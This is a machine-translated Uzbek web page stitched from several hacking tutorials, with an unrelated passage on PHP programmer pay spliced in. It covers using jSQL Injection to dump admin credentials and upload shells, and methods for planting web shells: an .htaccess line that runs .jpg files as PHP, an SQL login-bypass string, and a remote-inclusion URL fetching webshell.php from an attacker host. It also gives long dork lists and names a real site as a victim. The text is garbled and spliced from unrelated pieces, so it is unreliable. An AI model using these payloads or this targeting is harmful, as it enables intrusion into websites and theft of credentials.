Inurl php chapter num shaxsiy hisob. PHP tilini bilish orqali qanday qilib pul ishlash mumkin? Keling, aniq narsani unutmaylik

Yuklab olingan faylni ikki marta bosish orqali ishga tushiring (sizda bo'lishi kerak virtual mashina ).

3. SQL in'ektsiyasi uchun saytni tekshirishda anonimlik

Kali Linux-da Tor va Privoxy-ni sozlash

[Bo'lim ishlab chiqilmoqda]

Windows-da Tor va Privoxy-ni sozlash

[Bo'lim ishlab chiqilmoqda]

jSQL Injection-da proksi sozlamalari

[Bo'lim ishlab chiqilmoqda]

4. JSQL Injection bilan SQL in'ektsiyasi uchun saytni tekshirish

Dastur bilan ishlash juda oddiy. Shunchaki veb-sayt manzilini kiriting va ENTER tugmasini bosing.

Quyidagi skrinshotda sayt uchta turdagi SQL in'ektsiyalariga nisbatan zaif ekanligini ko'rsatadi (ular haqida ma'lumot pastki o'ng burchakda ko'rsatilgan). In'ektsiya nomlarini bosish orqali siz ishlatiladigan usulni o'zgartirishingiz mumkin:

Bundan tashqari, mavjud ma'lumotlar bazalari allaqachon bizga ko'rsatilgan.

Har bir jadvalning mazmunini ko'rishingiz mumkin:

Odatda, jadvallar haqida eng qiziqarli narsa administrator hisob ma'lumotlaridir.

Agar omadingiz bo'lsa va administrator ma'lumotlarini topsangiz, quvonishga hali erta. Ushbu ma'lumotlarni kiritish uchun siz hali ham administrator panelini topishingiz kerak.

5. jSQL Injection yordamida administrator panellarini qidiring

Buni amalga oshirish uchun keyingi yorliqga o'ting. Bu erda bizni mumkin bo'lgan manzillar ro'yxati kutib oladi. Tekshirish uchun bir yoki bir nechta sahifani tanlashingiz mumkin:

Qulaylik shundaki, boshqa dasturlardan foydalanish shart emas.

Afsuski, parollarni aniq matnda saqlaydigan beparvo dasturchilar unchalik ko'p emas. Ko'pincha parol qatorida biz shunga o'xshash narsalarni ko'ramiz

8743b52063cd84097a65d1633f5c74f5

Bu hash. Siz qo'pol kuch yordamida uni parolini hal qilishingiz mumkin. Va... jSQL Injection o'rnatilgan qo'pol kuchga ega.

6. JSQL Injection yordamida qo'pol kuch xeshlari

Shubhasiz qulaylik shundaki, siz boshqa dasturlarni qidirishingiz shart emas. Ko'pgina eng mashhur xeshlarni qo'llab-quvvatlash mavjud.

Bu eng ko'p emas eng yaxshi variant. Xeshlarni dekodlash bo'yicha guru bo'lish uchun rus tilidagi "" kitobi tavsiya etiladi.

Ammo, albatta, boshqa dastur bo'lmaganda yoki o'rganishga vaqt bo'lmasa, jSQL Injection o'rnatilgan qo'pol kuch funktsiyasi bilan juda foydali bo'ladi.

Sozlamalar mavjud: parolga qaysi belgilar kiritilganligini, parol uzunligi oralig'ini belgilashingiz mumkin.

7. SQL inyeksiyalarini aniqlagandan keyin fayl operatsiyalari

Ma'lumotlar bazalari bilan operatsiyalardan tashqari - ularni o'qish va o'zgartirish, agar SQL in'ektsiyalari aniqlansa, quyidagi fayl operatsiyalarini bajarish mumkin:

  • serverdagi fayllarni o'qish
  • serverga yangi fayllarni yuklash
  • qobiqlarni serverga yuklash

Va bularning barchasi jSQL Injection-da amalga oshiriladi!

Cheklovlar mavjud - SQL server fayl huquqlariga ega bo'lishi kerak. Aqllilar tizim ma'murlari ular nogiron va kirish huquqiga ega fayl tizimi ololmaydi.

Fayl huquqlarining mavjudligini tekshirish juda oddiy. Yorliqlardan biriga o'ting (fayllarni o'qish, qobiq yaratish, yangi faylni yuklash) va belgilangan operatsiyalardan birini bajarishga harakat qiling.

Yana bir muhim eslatma - biz ishlaydigan faylga aniq mutlaq yo'lni bilishimiz kerak - aks holda hech narsa ishlamaydi.

Quyidagi skrinshotga qarang:

Fayl bilan ishlashga urinish uchun biz quyidagi javobni olamiz: FILE imtiyozi yo'q(fayl imtiyozlari yo'q). Va bu erda hech narsa qilish mumkin emas.

Buning o'rniga sizda boshqa xato bo'lsa:

[katalog_nomi] ga yozishda muammo

Bu siz faylni yozmoqchi bo'lgan mutlaq yo'lni noto'g'ri ko'rsatganingizni anglatadi.

Mutlaq yo'lni taxmin qilish uchun siz hech bo'lmaganda server ishlayotgan operatsion tizimni bilishingiz kerak. Buning uchun "Tarmoq" yorlig'iga o'ting.

Bunday rekord (chiziq Win64) biz Windows OS bilan ishlaymiz deb taxmin qilishimizga asos beradi:

Keep-Alive: timeout=5, max=99 Server: Apache/2.4.17 (Win64) PHP/7.0.0RC6 Ulanish: Keep-Alive usuli: HTTP/1.1 200 OK Kontent uzunligi: 353 Sana: Juma, 11-dekabr 2015-yil 11:48:31 GMT X-Powered-By: PHP/7.0.0RC6 Kontent turi: matn/html; charset=UTF-8

Mana bizda Unix (*BSD, Linux) mavjud:

Transfer-kodlash: parchalangan sana: 2015-yil 11-dekabr 11:57:02 GMT usuli: HTTP/1.1 200 OK Jonli saqlash: vaqt tugashi=3, maks=100 Ulanish: tirik qolish Kontent turi: matn/html X- Muallif: PHP/5.3.29 Server: Apache/2.2.31 (Unix)

Va bizda CentOS mavjud:

Usul: HTTP/1.1 200 OK Muddati tugaydi: 1981 yil 19-noyabr, payshanba, 08:52:00 GMT oʻrnatilgan cookie: PHPSESSID=9p60gtunrv7g41iurr814h9rd0; path=/ Ulanish: keep-alive X-Cache-Lookup: MISS from t1.hoster.ru:6666 Server: Apache/2.2.15 (CentOS) X-Powered-By: PHP/5.4.37 X-Kesh: MISS dan t1.hoster.ru Kesh-nazorat: do'kon yo'q, kesh yo'q, qayta tekshirish kerak, tekshirishdan keyingi=0, oldindan tekshirish=0 Pragma: kesh yo'q Sana: 2015 yil 11 dekabr, 12:08:54 GMT Transfer-kodlash: bo'laklangan tarkib turi: matn/html; charset=WINDOWS-1251

Windows-da saytlar uchun odatiy papka mavjud C:\Server\data\htdocs\. Ammo, aslida, agar kimdir Windows-da server yaratish haqida "o'ylagan" bo'lsa, demak, bu odam imtiyozlar haqida hech narsa eshitmagan. Shuning uchun siz to'g'ridan-to'g'ri C:/Windows/ katalogidan urinib ko'rishingiz kerak:

Ko'rib turganingizdek, birinchi marta hamma narsa yaxshi bo'ldi.

Ammo jSQL Injection qobiqlarining o'zi mening miyamda shubhalarni keltirib chiqaradi. Agar sizda fayl huquqlari bo'lsa, veb-interfeys yordamida biror narsani osongina yuklashingiz mumkin.

8. SQL in'ektsiyalari uchun saytlarni ommaviy tekshirish

Va hatto bu funksiya jSQL Injection-da mavjud. Hammasi juda oddiy - saytlar ro'yxatini yuklab oling (fayldan import qilishingiz mumkin), tekshirmoqchi bo'lganlarni tanlang va operatsiyani boshlash uchun tegishli tugmani bosing.

jSQL Injection dan xulosa

jSQL Injection - bu veb-saytlarda topilgan SQL in'ektsiyalarini qidirish va undan keyin foydalanish uchun yaxshi, kuchli vosita. Uning shubhasiz afzalliklari: foydalanish qulayligi, o'rnatilgan tegishli funktsiyalar. jSQL Injection bo'lishi mumkin eng yaqin do'st veb-sayt tahlili uchun yangi.

Kamchiliklar orasida ma'lumotlar bazalarini tahrirlashning iloji yo'qligini ta'kidlayman (by kamida Men bu funksiyani topmadim). Barcha asboblar kabi grafik interfeys, ushbu dasturning kamchiliklaridan biri uni skriptlarda ishlata olmaslik bilan bog'liq bo'lishi mumkin. Shunga qaramay, ushbu dasturda ba'zi avtomatlashtirish ham mumkin - o'rnatilgan saytni ommaviy skanerlash funktsiyasi tufayli.

belgilangan namuna va sertifikat. tomonidan maxsus chegirma har qanday fakultet va kurslar uchun!

Kompyuterlar va Internetning paydo bo'lishi bilan ko'plab qo'shimcha kasblar paydo bo'ldi.


Dasturlash bo'yicha mutaxassislar hozirda talabga ega, chunki Internet orqali ko'plab turli loyihalar ishga tushirilmoqda. Shuning uchun barcha abituriyentlar kompyuterlar bilan bog'liq mutaxassislikni tanlash haqida o'ylashlari kerak.

PHP tilini bilish orqali qanday qilib pul ishlash mumkin? Ushbu maqolada biz dasturlash sohalaridan birini ko'rib chiqamiz. Ilovalarni ishlab chiqish uchun skript tili faol qo'llaniladi.

Texnologiya ko'p yillar davomida dolzarb bo'lib kelgan va agar siz PHP tilini o'rgansangiz, yaxshi pul ishlashingiz mumkin. Eng muhimi, bu soha mutaxassislariga talab katta.

PHP dasturchisi qancha maosh oladi?

Aniq miqdorni nomlash mumkin emas, chunki hamma ishlaydi turli kompaniyalar, va ba'zilari hatto uydan ishlaydi. Har holda faol ishchilar yaxshi maosh oladi.

Uydan chiqmasdan ishlayotganlar buyurtmalarni bajarishga muvaffaq bo'lganlaricha olishadi. Joylardagi narxlar kamdan-kam hollarda belgilanadi, ko'pincha ular individual ravishda kelishib olinadi.

Ijobiy tomondan PHP ishi Dasturchi sifatida faoliyatning jiddiy istiqbollari va dolzarbligini ta'kidlash kerak. Internet deyarli barcha sohalarga kirib borayotgan bir paytda, dasturchi sifatida ishlash haqiqatan ham foydali.


Ushbu maqolada men veb-saytga qobiqni yuklashning eng ko'p qo'llaniladigan usullari haqida gapirmoqchiman. Veb-qobiq tajovuzkorlar veb-saytlar yoki serverlarni boshqarish uchun foydalanadigan zararli skript (dastur) turidir.

1-usul
Fayllar/rasmlarni yuklash uchun veb-saytda shaklni toping. Aytaylik, biz saytning administrator panelini buzib bo'lmadik va biz o'z qobig'imizni to'ldirishga harakat qilyapmiz. kengaytma.php.jpg. Muvaffaqiyatli bo'lsa, biz rasm o'rniga oq oynani ko'ramiz, biz sichqonchaning o'ng tugmachasini bosing va havolani kuzatib boramiz. Muvaffaqiyatsiz bo'lsa, biz foydalanishimiz mumkin Chrome kengaytmasi ma'lumotlarni buzish. Bu so'rovni xohlagancha ushlab turish va o'zgartirish imkonini beradi. Agar sayt fayl kengaytmasini tekshirsa, avval biz yuklashimiz mumkin .htaccess mazmuni bilan fayl:
AddType ilovasi/x-httpd-php .jpg
Bu buyruq bajaradi jpg fayllar php kabi.
Batafsil video ko'rsatmalar:

Video ko'rsatmalar uchun ma'lumotlarni o'rnatish:


2-usul
Saytda administrator panellarini qidirish uchun dasturdan foydalaning - https://github.com/bdblackhat/admin-panel-finder. Dastur administrator panelini topganda, biz sql-injection-ni sinab ko'rishimiz mumkin. Saytning login va parol maydoniga kodni kiritamiz:

" yoki "1"="1" YOKI 1=1/*

Agar u ishlayotgan bo'lsa, biz administrator paneliga o'tamiz va Biz 1-usul bo'yicha harakat qilamiz. Agar saytdagi administrator panelida sql-injection mavjud bo'lmasa, biz uni disk raskadrovka qilishga urinib ko'rishimiz yoki ushbu CMS uchun ekspluatatsiyani topishimiz mumkin.
Batafsil video ko'rsatmalar:


3-usul
3-usulda biz saytning o'zida sql-injectionni qidiramiz. Biz buni qo'lda qilishimiz yoki sqlmap-dan foydalanishimiz mumkin. Forumda in'ektsiyalarni qanday qilish kerakligi haqida etarlicha mavzular mavjud, shuning uchun men uzoqdan kelaman. Shunday qilib, biz allaqachon administratorning login va paroli bilan jadvalni topdik, xeshlarni parolini hal qiling, administrator paneliga o'ting va xursand bo'ling. Aytaylik, biz parolni hal qila olmadik va hamma narsa noto'g'ri ketdi, keyin foydalanuvchimizning imtiyozlarini tekshirishimiz kerak. . Biz imtiyozlarni tekshiramiz va mini-qobiqni yuklaymiz. Ba'zi sabablarga ko'ra, kodni joylashtirmoqchi bo'lganimda, sayt menga xatolik beradi.

4-usul
4-usul nazarda tutadi csrf hujumi. Quyidagi kodda biz almashtirishimiz kerak http:// maqsadli havolamizga. Qobiqni tanlang va tugmani bosing yuklash.



5-usul
Maqsadingiz haqida ko'proq bilib oling va ekspluatatsiya toping. Buning uchun juda qiziqarli veb-sayt mavjud - https://www.exploit-db.com. Hech kim zaifliklar orqali veb-saytlarni ommaviy buzishni bekor qilmagan, ammo shaklda bu haqda allaqachon maqola mavjud.

Qobiqni to'ldirishning yana ko'p usullari mavjud va ularning har biri haqida gapirishning ma'nosi yo'q. Agar siz mashq qilmoqchi bo'lsangiz, u holda dvwa-ni o'rnating - bu xavfsizlik mutaxassislariga o'z malakalari va vositalarini qonuniy muhitda sinab ko'rishga yordam berish uchun mo'ljallangan dastur.

6-usul
Php in'ektsiyasi- bu tajovuzkor o'zining PHP kodini hujum qilingan PHP ilovasiga kiritganda veb-saytga hujum qilish shaklidir.

www.site.ru?page=home.html
Buyruqni bajarish orqali biz uy, html sahifasini yuklaymiz. Endi biz zararli qobiqni yuklashga harakat qilamiz.
www.site.ru?page=http:/hacker.ru/webshell.php
Dork: Inurl:page=

Perl yordamida allaqachon yuklangan qobiqni topishning bir usuli ham mavjud

Shunday qilib, endi men sizga biron bir maxsus bilimga ega bo'lmagan narsalarni qanday buzishni aytaman. Men darhol aytaman, bundan ozgina foyda bor, lekin baribir.
Birinchidan, siz saytlarni o'zingiz topishingiz kerak. Buning uchun google.com saytiga o‘ting va dorksni qidiring

Inurl:pageid= inurl:games.php?id= inurl:page.php?file= inurl:newsDetail.php?id= inurl:gallery.php?id= inurl:article.php?id= inurl:show.php? id= inurl:staff_id= inurl:newsitem.php?num= inurl:readnews.php?id= inurl:top10.php?cat= inurl:historialeer.php?num= inurl:reagir.php?num= inurl:Stray- Questions-View.php?num= inurl:forum_bds.php?num= inurl:game.php?id= inurl:view_product.php?id= inurl:newsone.php?id= inurl:sw_comment.php?id= inurl: news.php?id= inurl:avd_start.php?avd= inurl:event.php?id= inurl:product-item.php?id= inurl:sql.php?id= inurl:news_view.php?id= inurl: select_biblio.php?id= inurl:humor.php?id= inurl:aboutbook.php?id= inurl:ogl_inet.php?ogl_id= inurl:fiche_spectacle.php?id= inurl:communique_detail.php?id= inurl:sem. php3?id= inurl:kategorie.php4?id= inurl:news.php?id= inurl:index.php?id= inurl:faq2.php?id= inurl:show_an.php?id= inurl:preview.php? id= inurl:loadpsb.php?id= inurl:opinions.php?id= inurl:spr.php?id= inurl:pages.php?id= inurl:announce.php?id= inurl:clanek.php4?id= inurl:participant.php?id= inurl:download.php?id= inurl:main.php?id= inurl:review.php?id= inurl:chappies.php?id= inurl:read.php?id= inurl: prod_detail.php?id= inurl:viewphoto.php?id= inurl:article.php?id= inurl:person.php?id= inurl:productinfo.php?id= inurl:showimg.php?id= inurl:view. php?id= inurl:website.php?id= inurl:hosting_info.php?id= inurl:gallery.php?id= inurl:rub.php?idr= inurl:view_faq.php?id= inurl:artikelinfo.php? id= inurl:detail.php?ID= inurl:index.php?= inurl:profile_view.php?id= inurl:category.php?id= inurl:publications.php?id= inurl:fellows.php?id= inurl :downloads_info.php?id= inurl:prod_info.php?id= inurl:shop.php?do=part&id= inurl:productinfo.php?id= inurl:collectionitem.php?id= inurl:band_info.php?id= inurl :product.php?id= inurl:releases.php?id= inurl:ray.php?id= inurl:produit.php?id= inurl:pop.php?id= inurl:shopping.php?id= inurl:productdetail .php?id= inurl:post.php?id= inurl:viewshowdetail.php?id= inurl:clubpage.php?id= inurl:memberInfo.php?id= inurl:section.php?id= inurl:theme.php ?id= inurl:page.php?id= inurl:shredder-categories.php?id= inurl:tradeCategory.php?id= inurl:product_ranges_view.php?ID= inurl:shop_category.php?id= inurl:transcript.php ?id= inurl:channel_id= inurl:item_id= inurl:newsid= inurl:trainers.php?id= inurl:news-full.php?id= inurl:news_display.php?getid= inurl:index2.php?option= inurl :readnews.php?id= inurl:top10.php?cat= inurl:newsone.php?id= inurl:event.php?id= inurl:product-item.php?id= inurl:sql.php?id= inurl :aboutbook.php?id= inurl:preview.php?id= inurl:loadpsb.php?id= inurl:pages.php?id= inurl:material.php?id= inurl:clanek.php4?id= inurl:announce .php?id= inurl:chappies.php?id= inurl:read.php?id= inurl:viewapp.php?id= inurl:viewphoto.php?id= inurl:rub.php?idr= inurl:galeri_info.php ?l= inurl:review.php?id= inurl:iniziativa.php?in= inurl:curriculum.php?id= inurl:labels.php?id= inurl:story.php?id= inurl:look.php? ID= inurl:newsone.php?id= inurl:aboutbook.php?id= inurl:material.php?id= inurl:opinions.php?id= inurl:announce.php?id= inurl:rub.php?idr= inurl:galeri_info.php?l= inurl:tekst.php?idt= inurl:newscat.php?id= inurl:newsticker_info.php?idn= inurl:rubrika.php?idr= inurl:rubp.php?idr= inurl: offer.php?idf= inurl:art.php?idm= inurl:title.php?id= inurl:".php?id=1" inurl:".php?cat=1" inurl:".php?catid= 1" inurl:".php?num=1" inurl:".php?bid=1" inurl:".php?pid=1" inurl:".php?nid=1"

bu erda kichik ro'yxat. Siz o'zingiznikidan foydalanishingiz mumkin. Shunday qilib, biz saytni topdik. Masalan, http://www.vestitambov.ru/
Keyinchalik, ushbu dasturni yuklab oling

**Yashirin kontent: Bu yashirin kontentni koʻrish uchun sizning postlaringiz soni 3 yoki undan koʻp boʻlishi kerak.**

OK tugmasini bosing. Keyin biz qurbonlik joyini joylashtiramiz.
Biz start tugmasini bosamiz. Keyin natijalarni kutamiz.
Shunday qilib, dastur SQL zaifligini topdi.

Keyin, Havijni yuklab oling, http://www.vestitambov.ru:80/index.php?module=group_programs&id_gp= olingan havolani u erga joylashtiring. Men Havijdan qanday foydalanishni va uni qaerdan yuklab olishni tushuntirmayman; uni topish qiyin emas. Hammasi. Siz kerakli ma'lumotlarni oldingiz - administrator paroli, keyin bu sizning tasavvuringizga bog'liq.

P.S. Bu mening biror narsa yozishga birinchi urinishim. Agar biror narsa noto'g'ri bo'lsa, uzr

Qidiruv mexanizmi Google tizimi(www.google.com) ko'plab qidiruv imkoniyatlarini taqdim etadi. Bu xususiyatlarning barchasi Internetda yangi foydalanuvchi uchun bebaho qidiruv vositasi va shu bilan birga yomon niyatli odamlar, jumladan, nafaqat xakerlar, balki kompyuter bo'lmagan jinoyatchilar qo'lida bosqinchilik va halokatning yanada kuchli qurolidir. hatto terrorchilar.
(1 haftada 9475 marta koʻrildi)

Denis Barankov
denisNOSPAMixi.ru

Diqqat:Ushbu maqola harakatlar uchun qo'llanma emas. Ushbu maqola siz, WEB-server ma'murlari uchun, siz xavfsiz ekanligingiz haqidagi yolg'on tuyg'uni yo'qotishingiz va nihoyat, ma'lumot olishning ushbu usulining makkorligini tushunishingiz va saytingizni himoya qilish vazifasini o'z zimmangizga olishingiz uchun yozilgan.

Kirish

Masalan, men 0,14 soniyada 1670 sahifa topdim!

2. Boshqa qatorni kiritamiz, masalan:

inurl: "auth_user_file.txt"

biroz kamroq, lekin bu bepul yuklab olish va parolni taxmin qilish uchun etarli (xuddi shu John The Ripper yordamida). Quyida yana bir qancha misollar keltiraman.

Shunday qilib, Google qidiruv tizimi ko'pgina Internet saytlariga tashrif buyurganini va ulardagi ma'lumotlarni keshlaganligini tushunishingiz kerak. Ushbu keshlangan ma'lumotlar sizga to'g'ridan-to'g'ri saytga ulanmasdan, faqat Google ichida saqlanadigan ma'lumotlarni o'rganish orqali sayt va sayt mazmuni haqida ma'lumot olish imkonini beradi. Bundan tashqari, agar saytdagi ma'lumotlar mavjud bo'lmasa, keshdagi ma'lumotlar saqlanib qolishi mumkin. Ushbu usul uchun sizga kerak bo'lgan narsa: bir oz biling kalit so'zlar Google. Ushbu usul Google Hacking deb ataladi.

Google Hacking haqidagi ma'lumotlar birinchi marta Bugtruck pochta ro'yxatida 3 yil oldin paydo bo'lgan. 2001 yilda bu mavzu fransuz talabasi tomonidan ko'tarilgan. Bu maktubga havola http://www.cotse.com/mailing-lists/bugtraq/2001/Nov/0129.html. Unda bunday so'rovlarning birinchi misollari keltirilgan:

1) /admin indeksi
2) /parol indeksi
3) / pochta indeksi
4) / +banques +filetype:xls indeksi (Frantsiya uchun...)
5) / + passwd indeksi
6) / password.txt indeksi

Bu mavzu yaqinda Internetning ingliz tilini o'qiydigan qismida to'lqinlarni keltirib chiqardi: Jonni Longning 2004 yil 7 mayda chop etilgan maqolasidan keyin. Google Hacking-ni to'liqroq o'rganish uchun sizga ushbu muallifning http://johnny.ihackstuff.com veb-saytiga o'tishingizni maslahat beraman. Ushbu maqolada men sizni hozirgi kunga olib kelmoqchiman.

Bundan kim foydalanishi mumkin:
- Jurnalistlar, ayg'oqchilar va boshqalarning ishiga burnini tiqishni yaxshi ko'radiganlar bundan ayblovchi dalillarni qidirish uchun foydalanishlari mumkin.
- Xakerlar xakerlik uchun mos nishonlarni qidirmoqda.

Google qanday ishlaydi.

Suhbatni davom ettirish uchun Google so'rovlarida ishlatiladigan ba'zi kalit so'zlarni eslatib o'taman.

+ belgisi yordamida qidiring

Google ahamiyatsiz deb hisoblagan so'zlarni qidiruvdan chiqarib tashlaydi. Masalan, so'roq so'zlari, predloglar va artikllar Ingliz tili: masalan, bor, ning, qaerda. Rus tilida Google barcha so'zlarni muhim deb hisoblaydi. Agar so'z qidiruvdan chiqarib tashlansa, Google bu haqda yozadi. Kimga Google ishga tushdi ushbu so'zlar yozilgan sahifalarni qidirish uchun so'z oldidan bo'sh joy qoldirmasdan + belgisini qo'shishingiz kerak. Masalan:

ace + asos

Belgidan foydalanib qidirish -

Agar Google ma'lum bir mavzudagi sahifalarni chiqarib tashlashi kerak bo'lgan ko'p sonli sahifalarni topsa, siz Googleni faqat ma'lum so'zlarni o'z ichiga olmagan sahifalarni qidirishga majbur qilishingiz mumkin. Buning uchun siz ushbu so'zlarni har birining oldiga belgi qo'yish orqali ko'rsatishingiz kerak - so'zdan oldin bo'sh joy qoldirmasdan. Masalan:

baliq ovlash - aroq

~ yordamida qidirish

Siz nafaqat belgilangan so'zni, balki uning sinonimlarini ham qidirishni xohlashingiz mumkin. Buning uchun so'z oldiga ~ belgisi qo'yiladi.

Ikki tirnoq yordamida aniq iborani topish

Google har bir sahifada so'rovlar qatorida siz yozgan so'zlarning barcha takrorlanishini qidiradi va barcha belgilangan so'zlar bir vaqtning o'zida sahifada bo'lsa, so'zlarning nisbiy o'rni haqida qayg'urmaydi (bu standart harakat). Aniq iborani topish uchun uni qo'shtirnoq ichiga qo'yish kerak. Masalan:

"bookend"

Belgilangan so'zlardan kamida bittasi paydo bo'lishi uchun siz belgilashingiz kerak mantiqiy operatsiya aniq: OR. Masalan:

kitob xavfsizligi yoki himoyasi

Bundan tashqari, istalgan so'zni ko'rsatish uchun qidiruv panelidagi * belgisidan foydalanishingiz mumkin. har qanday belgini ifodalash uchun.

Foydalanishda so'zlarni qidiring qo'shimcha operatorlar

Mavjud qidiruv operatorlari, ular qidiruv satrida quyidagi formatda ko'rsatilgan:

operator: search_term

Yo'g'on ichakning yonidagi bo'shliqlar kerak emas. Ikki nuqtadan keyin bo'sh joy qo'ysangiz, xato xabarini ko'rasiz va undan oldin Google ularni oddiy qidiruv qatori sifatida ishlatadi.
Qo'shimcha qidiruv operatorlari guruhlari mavjud: tillar - natijani qaysi tilda ko'rishni xohlayotganingizni ko'rsating, sana - oxirgi uch, olti yoki 12 oy davomida natijalarni cheklash, hodisalar - hujjatning qayerini qidirish kerakligini ko'rsating qator: hamma joyda, sarlavhada, URLda, domenlarda - ko'rsatilgan saytdan qidirish yoki aksincha, uni qidiruvdan chiqarib tashlash; xavfsiz qidiruv - belgilangan turdagi ma'lumotlarni o'z ichiga olgan saytlarni bloklaydi va ularni qidiruv natijalari sahifalaridan olib tashlaydi.
Biroq, ba'zi operatorlar qo'shimcha parametrni talab qilmaydi, masalan, so'rov " kesh:www.google.com" to'liq huquqli qidiruv qatori deb atash mumkin va ba'zi kalit so'zlar, aksincha, qidiruv so'zini talab qiladi, masalan " sayti:www.google.com yordam". Mavzumizdan kelib chiqib, quyidagi operatorlarni ko'rib chiqamiz:

Operator

Tavsif

Qo'shimcha parametr kerakmi?

faqat qidiruv_termida ko'rsatilgan saytdan qidiring

faqat search_term turidagi hujjatlarda qidirish

sarlavhada search_term mavjud sahifalarni toping

sarlavhadagi barcha qidiruv so'zlarini o'z ichiga olgan sahifalarni toping

manzilida search_term so'zini o'z ichiga olgan sahifalarni toping

manzilidagi barcha qidiruv so'zlari bo'lgan sahifalarni toping

Operator sayt: qidiruvni faqat belgilangan saytga cheklaydi va siz nafaqat belgilashingiz mumkin Domen nomi, balki IP-manzil ham. Masalan, kiriting:

Operator fayl turi: Qidiruvni ma'lum bir fayl turiga cheklaydi. Masalan:

Maqola nashr etilgan sanadan boshlab Google 13 xil fayl formatida qidirishi mumkin:

  • Adobe portativ hujjat formati (pdf)
  • Adobe PostScript (ps)
  • Lotus 1-2-3 (wk1, wk2, wk3, wk4, wk5, wki, wks, wku)
  • Lotus WordPro (lwp)
  • MacWrite (mw)
  • Microsoft Excel(xls)
  • Microsoft PowerPoint(ppt)
  • Microsoft Word(hujjat)
  • Microsoft Works (wks, wps, wdb)
  • Microsoft Write (yozish)
  • Rich matn formati (rtf)
  • Shockwave Flash(swf)
  • Matn (ans, txt)

Operator havola: belgilangan sahifaga ishora qiluvchi barcha sahifalarni ko'rsatadi.
Internetda siz haqingizda qancha joy bilishini bilish har doim qiziq bo'lsa kerak. Kel urinib ko'ramiz:

Operator kesh: Saytning Google keshidagi versiyasini Google ushbu sahifaga oxirgi marta tashrif buyurganida ko'rsatadi. Tez-tez o'zgarib turadigan har qanday saytni olaylik va ko'rib chiqamiz:

Operator sarlavha: sahifa sarlavhasida ko'rsatilgan so'zni qidiradi. Operator allintitle: kengaytmadir - u sahifa sarlavhasida ko'rsatilgan barcha so'zlarni qidiradi. Taqqoslash:

intitle: Marsga parvoz
intitle:flight intitle:on intitle:mars
allintitle: Marsga parvoz

Operator inurl: Google-ni URLda belgilangan qatorni o'z ichiga olgan barcha sahifalarni ko'rsatishga majbur qiladi. allinurl operatori: URLdagi barcha so'zlarni qidiradi. Masalan:

allinurl:acid acid_stat_alerts.php

Bu buyruq, ayniqsa, SNORT-ga ega bo'lmaganlar uchun foydalidir - hech bo'lmaganda ular haqiqiy tizimda qanday ishlashini ko'rishlari mumkin.

Google yordamida xakerlik usullari

Shunday qilib, biz yuqoridagi operatorlar va kalit so'zlarning kombinatsiyasidan foydalangan holda, har kim kerakli ma'lumotlarni to'plashi va zaifliklarni qidirishi mumkinligini aniqladik. Ushbu usullar ko'pincha Google Hacking deb ataladi.

Sayt xaritasi

Google saytdan topgan barcha havolalarni ro'yxatga olish uchun sayt: operatoridan foydalanishingiz mumkin. Odatda, skriptlar tomonidan dinamik ravishda yaratilgan sahifalar parametrlar yordamida indekslanmaydi, shuning uchun ba'zi saytlar havolalar shaklda bo'lmasligi uchun ISAPI filtrlaridan foydalanadi. /article.asp?num=10&dst=5, va qiyshiq chiziqlar bilan /maqola/abc/num/10/dst/5. Bu sayt odatda qidiruv tizimlari tomonidan indekslanishi uchun amalga oshiriladi.

Kel urinib ko'ramiz:

sayt: www.whitehouse.gov oq uy

Google veb-saytdagi har bir sahifada oq uy so'zini o'z ichiga oladi deb o'ylaydi. Bu biz barcha sahifalarni olish uchun foydalanamiz.
Bundan tashqari, soddalashtirilgan versiya mavjud:

sayt: whitehouse.gov

Va eng yaxshi tomoni shundaki, whitehouse.gov saytidagi o'rtoqlar biz ularning saytining tuzilishini ko'rib chiqqanimizni va hatto Google yuklab olgan keshlangan sahifalarni ko'rib chiqqanimizni ham bilishmagan. Bu saytlar tuzilishini o'rganish va kontentni ko'rish uchun ishlatilishi mumkin, hozircha aniqlanmagan.

Kataloglardagi fayllar ro'yxatini ko'rish

WEB-serverlar odatdagilar o'rniga server kataloglari ro'yxatini ko'rsatishi mumkin HTML sahifalar. Bu odatda foydalanuvchilarning ma'lum fayllarni tanlashi va yuklab olishini ta'minlash uchun amalga oshiriladi. Biroq, ko'p hollarda, ma'murlar katalog mazmunini ko'rsatish niyatida emas. Bu noto'g'ri server konfiguratsiyasi yoki yo'qligi tufayli sodir bo'ladi bosh sahifa katalogda. Natijada, xaker ma'lumotnomada qiziqarli narsalarni topish va undan o'z maqsadlarida foydalanish imkoniyatiga ega bo'ladi. Bunday sahifalarning barchasini topish uchun ularning barchasida quyidagi so'zlar mavjudligini ta'kidlash kifoya: indeks. Ammo indeks so'zlari nafaqat bunday sahifalarni o'z ichiga olganligi sababli, biz so'rovni aniqlashtirishimiz va sahifadagi kalit so'zlarni hisobga olishimiz kerak, shuning uchun so'rovlar quyidagicha:

intitle: index.of ota-katalog
intitle:indeks.of nom hajmi

Ko'pgina katalog ro'yxatlari qasddan qilinganligi sababli, birinchi marta noto'g'ri joylashtirilgan ro'yxatlarni topish qiyin bo'lishi mumkin. Lekin hech bo'lmaganda aniqlash uchun ro'yxatlardan foydalanishingiz mumkin WEB versiyalari server quyida tavsiflanganidek.

WEB server versiyasini olish.

WEB-server versiyasini bilish har qanday xakerlik hujumini boshlashdan oldin har doim foydalidir. Shunga qaramay, Google tufayli siz ushbu ma'lumotni serverga ulanmasdan olishingiz mumkin. Agar siz katalog ro'yxatiga diqqat bilan qarasangiz, u erda WEB server nomi va uning versiyasi ko'rsatilganligini ko'rishingiz mumkin.

Apache1.3.29 - trf296.free.fr 80 portidagi ProXad serveri

Tajribali ma'mur bu ma'lumotni o'zgartirishi mumkin, ammo, qoida tariqasida, bu haqiqatdir. Shunday qilib, ushbu ma'lumotni olish uchun so'rov yuborish kifoya:

intitle:index.of server.at

Muayyan server uchun ma'lumot olish uchun biz so'rovni aniqlaymiz:

intitle:index.of server.at sayt:ibm.com

Yoki aksincha, biz ishlaydigan serverlarni qidirmoqdamiz maxsus versiya serverlar:

intitle:index.of Apache/2.0.40 Server manzili

Ushbu usul xaker tomonidan qurbonni topish uchun ishlatilishi mumkin. Agar, masalan, u WEB-serverning ma'lum bir versiyasi uchun ekspluatatsiyaga ega bo'lsa, u uni topib, mavjud ekspluatatsiyani sinab ko'rishi mumkin.

Shuningdek, siz WEB-serverning so'nggi versiyasini o'rnatishda sukut bo'yicha o'rnatilgan sahifalarni ko'rish orqali server versiyasini olishingiz mumkin. Masalan, ko'rish uchun sinov sahifasi Apache 1.2.6 shunchaki yozing

intitle:Apache uchun Test.Page.ishladi!

